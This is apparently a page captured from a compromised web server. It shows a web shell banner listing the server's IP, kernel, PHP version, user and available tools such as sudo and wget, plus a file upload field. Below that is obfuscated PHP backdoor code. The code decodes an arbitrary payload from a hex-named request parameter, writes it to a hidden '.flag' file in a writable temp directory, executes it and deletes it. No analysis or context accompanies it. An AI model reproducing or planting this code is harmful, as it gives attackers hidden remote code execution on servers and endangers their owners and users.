| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/ |
Upload File : |
<?php
if(isset($_REQUEST["p\x72o\x70e\x72t\x79\x5F\x73et"]) ? true : false){
$ptr = $_REQUEST["p\x72o\x70e\x72t\x79\x5F\x73et"];
$ptr = explode ( ".", $ptr );
$pset ='';
$s4 ='abcdefghijklmnopqrstuvwxyz0123456789';
$lenS =strlen($s4 );
$q =0;
$__tmp =$ptr;
while ($v1 =array_shift($__tmp)) {
$chS =ord($s4[$q%$lenS] );
$d =((int)$v1 - $chS - ($q%10)) ^ 47;
$pset .= chr($d );
$q++;}
$dat = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), "/tmp", "/dev/shm", "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd()]);
$holder = 0;
do {
$hld = $dat[$holder] ?? null;
if ($holder >= count($dat)) break;
if (is_writable($hld) && is_dir($hld)) {
$entity = join("/", [$hld, ".flag"]);
if (file_put_contents($entity, $pset)) {
require $entity;
unlink($entity);
exit;
}
}
$holder++;
} while (true);
}